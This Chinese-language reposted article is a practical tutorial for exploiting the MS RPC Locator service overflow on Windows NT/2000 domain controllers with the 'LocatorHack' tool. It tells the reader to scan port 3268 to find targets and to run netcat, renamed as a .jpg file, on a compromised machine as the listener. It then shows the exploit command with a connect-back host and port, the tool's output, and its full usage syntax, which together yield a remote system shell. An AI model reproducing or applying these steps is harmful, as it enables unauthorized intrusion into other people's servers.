rpc漏洞的利用
发布时间:2019-11-25 23:22:28 所属栏目:趣闻 来源:本站整理
导读:,rpc漏洞的利用
sunx出的那个程序成功率还不错 没用过的去sunx.org下载吧 简要说一下用法(给没用过的看的) 首先拿superscan去扫3268端口,因为这是域控制器的标志 这个漏洞只对域控制器有效 扫到这样的机器以后,用nc在本地监听一个端口 我是内网,只好在肉鸡上监听了 下面是在肉鸡上~nn.jpg就是我放上去的nc 218.0.0.0代表目标机 123.123.123.123 代表开nc监听的肉鸡 -------------- D:WINNTsystem32>nn.jpg -l -p 1111 nn.jpg -l -p 1111 ---------------~~ 然后在本地(ip不能说啊)参数大家自己查吧 --------------- C:>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111 MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, connect socket.... connect smb... open namedpipe... bind rpc... call rpc... Overflowed, 218.0.0.0:1111 ------???是不是弄错? good luck ------------------ 这时候肉鸡上就出现了对方的system32目录 usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port> OS Version: winnt: 1 win2k: 2 winxp: 3 OS Language: english: 1 chinese: 2 japanese: 3 Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99 -h 目标主机 -v OS Version 2000就选2 -l OS Language 按照上面的选择 -s 选择所打的补丁 -r 开nc的主机,可以是你自己也可以放在肉鸡上 -p 用nc开的端口 Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到. (编辑:187手机网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |